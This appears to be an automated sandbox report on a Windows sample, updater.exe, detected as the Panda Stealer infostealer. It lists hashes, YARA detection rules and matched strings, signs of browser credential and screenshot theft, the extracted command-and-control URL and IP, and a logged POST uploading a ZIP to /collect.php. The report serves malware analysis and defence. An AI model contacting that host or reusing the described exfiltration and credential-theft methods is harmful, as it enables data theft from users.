Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
updater.exe

Overview

General Information

Sample Name:updater.exe
Analysis ID:1266489
MD5:5b7111ae32c04c641c56e81a6293ec48
SHA1:77331d9725c41635d6d449414c8a0d4ee00fac63
SHA256:4cedab343fc4581149b13b7f6fd6532fa2c437550dee42926b37a93c6b5997f9
Infos:

Detection

Panda Stealer
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Panda Stealer
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Searches the installation path of Mozilla Firefox
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to read the PEB
PE / OLE file has an invalid certificate
Uses Microsoft's Enhanced Cryptographic Provider
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Classification

  • System is w7x64
  • updater.exe (PID: 2648 cmdline: C:\Users\user\Desktop\updater.exe MD5: 5B7111AE32C04C641C56E81A6293EC48)
  • cleanup
{"C2 url": "http://f0837288.xsph.ru", "Version": "1.11"}
SourceRuleDescriptionAuthorStrings
updater.exeJoeSecurity_PandaStealerYara detected Panda StealerJoe Security
    updater.exeMALWARE_Win_AlfonosoDetects Alfonoso / Shurk / HunterStealer infostealerditekSHen
    • 0x96a6c:$s1: %s\etilqs_
    • 0x96bcc:$s2: SELECT name, rootpage, sql FROM '%q'.%s
    • 0x97338:$s2: SELECT name, rootpage, sql FROM '%q'.%s
    • 0x96b80:$s3: %s-mj%08X
    • 0x92e7c:$s8: recursive_directory_iterator
    • 0x92e9a:$s8: recursive_directory_iterator
    • 0x92eb8:$s8: recursive_directory_iterator
    • 0x96194:$s9: 2E 7A 69 70 00 00 00 00 2E 7A 6F 6F 00 00 00 00 2E 61 72 63 00 00 00 00 2E 6C 7A 68 00 00 00 00 2E 61 72 6A 00 00 00 00 2E 67 7A 00 2E 74 67 7A 00 00 00 00
    • 0x96a84:$s11: :memory:
    • 0x92f28:$s12: current_path()
    • 0x96b6c:$s13: vtab:%p:%p
    updater.exeMALWARE_Win_PandaStealerDetects Panda StealerditekSHen
    • 0x96228:$s2: user.config
    • 0x96a6c:$s4: %s\etilqs_
    • 0xa18a0:$s7: .?AV?$_Ref_count_obj2@U_Recursive_dir_enum_impl@filesystem@std@@@
    • 0x96ea8:$s8: UPDATE %Q.%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr
    • 0x96d8d:$s9: || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (
    updater.exeWindows_Trojan_Pandastealer_8b333e76unknownunknown
    • 0x9636c:$a1: ] - [user:
    • 0x96378:$a2: [-] data unpacked failed
    • 0x96350:$a3: [+] data unpacked
    • 0x96288:$a4: \history\
    • 0x963d0:$a5: PlayerName
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Pandastealer_8b333e76unknownunknown
    • 0x1096c:$a1: ] - [user:
    • 0x10978:$a2: [-] data unpacked failed
    • 0x10950:$a3: [+] data unpacked
    • 0x10888:$a4: \history\
    • 0x109d0:$a5: PlayerName
    00000001.00000000.996893045.0000000001447000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Pandastealer_8b333e76unknownunknown
    • 0x1096c:$a1: ] - [user:
    • 0x10978:$a2: [-] data unpacked failed
    • 0x10950:$a3: [+] data unpacked
    • 0x10888:$a4: \history\
    • 0x109d0:$a5: PlayerName
    Process Memory Space: updater.exe PID: 2648JoeSecurity_PandaStealerYara detected Panda StealerJoe Security
      Process Memory Space: updater.exe PID: 2648Windows_Trojan_Pandastealer_8b333e76unknownunknown
      • 0x5042:$a1: ] - [user:
      • 0x50df:$a1: ] - [user:
      • 0x72cf3:$a1: ] - [user:
      • 0x72d90:$a1: ] - [user:
      • 0x504e:$a2: [-] data unpacked failed
      • 0x50ea:$a2: [-] data unpacked failed
      • 0x72cff:$a2: [-] data unpacked failed
      • 0x72d9b:$a2: [-] data unpacked failed
      • 0x5030:$a3: [+] data unpacked
      • 0x18c2a:$a3: [+] data unpacked
      • 0x72ce1:$a3: [+] data unpacked
      • 0x763e6:$a3: [+] data unpacked
      • 0x4cb1:$a4: \history\
      • 0x72962:$a4: \history\
      • 0x507e:$a5: PlayerName
      • 0x72d2f:$a5: PlayerName
      SourceRuleDescriptionAuthorStrings
      1.0.updater.exe.13c0000.0.unpackJoeSecurity_PandaStealerYara detected Panda StealerJoe Security
        1.0.updater.exe.13c0000.0.unpackMALWARE_Win_AlfonosoDetects Alfonoso / Shurk / HunterStealer infostealerditekSHen
        • 0x96a6c:$s1: %s\etilqs_
        • 0x96bcc:$s2: SELECT name, rootpage, sql FROM '%q'.%s
        • 0x97338:$s2: SELECT name, rootpage, sql FROM '%q'.%s
        • 0x96b80:$s3: %s-mj%08X
        • 0x92e7c:$s8: recursive_directory_iterator
        • 0x92e9a:$s8: recursive_directory_iterator
        • 0x92eb8:$s8: recursive_directory_iterator
        • 0x96194:$s9: 2E 7A 69 70 00 00 00 00 2E 7A 6F 6F 00 00 00 00 2E 61 72 63 00 00 00 00 2E 6C 7A 68 00 00 00 00 2E 61 72 6A 00 00 00 00 2E 67 7A 00 2E 74 67 7A 00 00 00 00
        • 0x96a84:$s11: :memory:
        • 0x92f28:$s12: current_path()
        • 0x96b6c:$s13: vtab:%p:%p
        1.0.updater.exe.13c0000.0.unpackMALWARE_Win_PandaStealerDetects Panda StealerditekSHen
        • 0x96228:$s2: user.config
        • 0x96a6c:$s4: %s\etilqs_
        • 0xa18a0:$s7: .?AV?$_Ref_count_obj2@U_Recursive_dir_enum_impl@filesystem@std@@@
        • 0x96ea8:$s8: UPDATE %Q.%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr
        • 0x96d8d:$s9: || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (
        1.0.updater.exe.13c0000.0.unpackWindows_Trojan_Pandastealer_8b333e76unknownunknown
        • 0x9636c:$a1: ] - [user:
        • 0x96378:$a2: [-] data unpacked failed
        • 0x96350:$a3: [+] data unpacked
        • 0x96288:$a4: \history\
        • 0x963d0:$a5: PlayerName
        1.2.updater.exe.13c0000.0.unpackJoeSecurity_PandaStealerYara detected Panda StealerJoe Security
          Click to see the 3 entries
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Panda Stealer {"C2 url": "http://f0837288.xsph.ru", "Version": "1.11"}
          Source: updater.exeReversingLabs: Detection: 91%
          Source: updater.exeVirustotal: Detection: 84%Perma Link
          Source: updater.exeAvira: detected
          Source: updater.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013D2705 CryptUnprotectData,CryptUnprotectData,1_2_013D2705
          Source: updater.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: updater.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_01406107 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,1_2_01406107
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_014061B5 GetLongPathNameW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,1_2_014061B5
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_01406127 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,1_2_01406127
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Users\user\Jump to behavior

          Networking

          barindex
          Source: Malware configuration extractorURLs: http://f0837288.xsph.ru
          Source: Joe Sandbox ViewIP Address: 141.8.192.151 141.8.192.151
          Source: Joe Sandbox ViewIP Address: 141.8.192.151 141.8.192.151
          Source: updater.exe, 00000001.00000002.1010523343.0000000008F6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
          Source: updater.exe, 00000001.00000002.1010523343.0000000008F6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0K
          Source: updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: updater.exe, 00000001.00000003.1001441345.0000000000464000.00000004.00000020.00020000.00000000.sdmp, WLDIDRPJXW.PRECQYBSH.1.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: updater.exe, 00000001.00000002.1010523343.0000000008F6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: WLDIDRPJXW.PRECQYBSH.1.drString found in binary or memory: https://www.google.com/favicon.ico
          Source: unknownHTTP traffic detected: POST /collect.php HTTP/1.1Content-Type: multipart/form-data; boundary=SendFileZIPBoundaryUser-Agent: uploaderHost: f0837288.xsph.ruContent-Length: 1661723Connection: Keep-AliveCache-Control: no-cache
          Source: unknownDNS traffic detected: queries for: f0837288.xsph.ru

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Source: Yara matchFile source: updater.exe, type: SAMPLE
          Source: Yara matchFile source: 1.0.updater.exe.13c0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.updater.exe.13c0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: Process Memory Space: updater.exe PID: 2648, type: MEMORYSTR
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013DB7C3 GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,EnterCriticalSection,LeaveCriticalSection,DeleteDC,DeleteObject,ReleaseDC,1_2_013DB7C3

          System Summary

          barindex
          Source: updater.exe, type: SAMPLEMatched rule: Detects Alfonoso / Shurk / HunterStealer infostealer Author: ditekSHen
          Source: updater.exe, type: SAMPLEMatched rule: Detects Panda Stealer Author: ditekSHen
          Source: updater.exe, type: SAMPLEMatched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
          Source: 1.0.updater.exe.13c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Alfonoso / Shurk / HunterStealer infostealer Author: ditekSHen
          Source: 1.0.updater.exe.13c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Panda Stealer Author: ditekSHen
          Source: 1.0.updater.exe.13c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
          Source: 1.2.updater.exe.13c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Alfonoso / Shurk / HunterStealer infostealer Author: ditekSHen
          Source: 1.2.updater.exe.13c0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Panda Stealer Author: ditekSHen
          Source: 1.2.updater.exe.13c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
          Source: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
          Source: 00000001.00000000.996893045.0000000001447000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
          Source: Process Memory Space: updater.exe PID: 2648, type: MEMORYSTRMatched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
          Source: updater.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: updater.exe, type: SAMPLEMatched rule: MALWARE_Win_Alfonoso snort2_sid = 920102, author = ditekSHen, description = Detects Alfonoso / Shurk / HunterStealer infostealer, clamav_sig = MALWARE.Win.Trojan.Alfonso, snort3_sid = 920100
          Source: updater.exe, type: SAMPLEMatched rule: MALWARE_Win_PandaStealer author = ditekSHen, description = Detects Panda Stealer
          Source: updater.exe, type: SAMPLEMatched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
          Source: 1.0.updater.exe.13c0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Alfonoso snort2_sid = 920102, author = ditekSHen, description = Detects Alfonoso / Shurk / HunterStealer infostealer, clamav_sig = MALWARE.Win.Trojan.Alfonso, snort3_sid = 920100
          Source: 1.0.updater.exe.13c0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_PandaStealer author = ditekSHen, description = Detects Panda Stealer
          Source: 1.0.updater.exe.13c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
          Source: 1.2.updater.exe.13c0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Alfonoso snort2_sid = 920102, author = ditekSHen, description = Detects Alfonoso / Shurk / HunterStealer infostealer, clamav_sig = MALWARE.Win.Trojan.Alfonso, snort3_sid = 920100
          Source: 1.2.updater.exe.13c0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_PandaStealer author = ditekSHen, description = Detects Panda Stealer
          Source: 1.2.updater.exe.13c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
          Source: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
          Source: 00000001.00000000.996893045.0000000001447000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
          Source: Process Memory Space: updater.exe PID: 2648, type: MEMORYSTRMatched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013D04AD1_2_013D04AD
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013CC9EC1_2_013CC9EC
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013DAF641_2_013DAF64
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013D91511_2_013D9151
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013D70091_2_013D7009
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013D30951_2_013D3095
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013C92941_2_013C9294
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013C35071_2_013C3507
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013CB6531_2_013CB653
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013D1BD61_2_013D1BD6
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013C7D351_2_013C7D35
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013D3E7B1_2_013D3E7B
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_014361291_2_01436129
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0142A3401_2_0142A340
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0142836D1_2_0142836D
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0143A3E31_2_0143A3E3
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013C85471_2_013C8547
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013D24311_2_013D2431
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0142C6F61_2_0142C6F6
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0143E93F1_2_0143E93F
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0142493E1_2_0142493E
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013E0B701_2_013E0B70
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0143EA5F1_2_0143EA5F
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_01420F701_2_01420F70
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_01400EF61_2_01400EF6
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0143CE9E1_2_0143CE9E
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013E90821_2_013E9082
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_014353C41_2_014353C4
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_014412001_2_01441200
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013C72BC1_2_013C72BC
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_014017021_2_01401702
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013F364A1_2_013F364A
          Source: C:\Users\user\Desktop\updater.exeCode function: String function: 0141E620 appears 36 times
          Source: C:\Users\user\Desktop\updater.exeCode function: String function: 0141E2BF appears 75 times
          Source: C:\Users\user\Desktop\updater.exeCode function: String function: 01440CFC appears 73 times
          Source: C:\Users\user\Desktop\updater.exeCode function: String function: 0141E2F3 appears 51 times
          Source: C:\Users\user\Desktop\updater.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
          Source: updater.exeStatic PE information: invalid certificate
          Source: C:\Users\user\Desktop\updater.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\updater.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
          Source: updater.exeReversingLabs: Detection: 91%
          Source: updater.exeVirustotal: Detection: 84%
          Source: updater.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\updater.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\updater.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile created: C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEEJump to behavior
          Source: classification engineClassification label: mal92.troj.spyw.winEXE@1/5@1/1
          Source: updater.exe, updater.exe, 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmp, updater.exe, 00000001.00000000.996893045.0000000001447000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: updater.exe, 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmp, updater.exe, 00000001.00000000.996893045.0000000001447000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
          Source: updater.exe, updater.exe, 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmp, updater.exe, 00000001.00000000.996893045.0000000001447000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013D6592 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,OpenProcess,QueryFullProcessImageNameA,Process32Next,Process32Next,1_2_013D6592
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013C433F LoadResource,LockResource,SizeofResource,1_2_013C433F
          Source: C:\Users\user\Desktop\updater.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile opened: C:\Windows\SysWOW64\RichEd32.dllJump to behavior
          Source: updater.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: updater.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0141E299 push ecx; ret 1_2_0141E2AC
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_0141E664 push ecx; ret 1_2_0141E676
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_01440D1A push eax; ret 1_2_01440D50
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_01440D9A push ecx; ret 1_2_01440DA9
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_01440CFC push eax; ret 1_2_01440D18
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013DA518 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_013DA518
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_013C3507 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,1_2_013C3507
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\updater.exe TID: 808Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\updater.exeCode function: 1_2_014224FE VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,1_2_014224FE
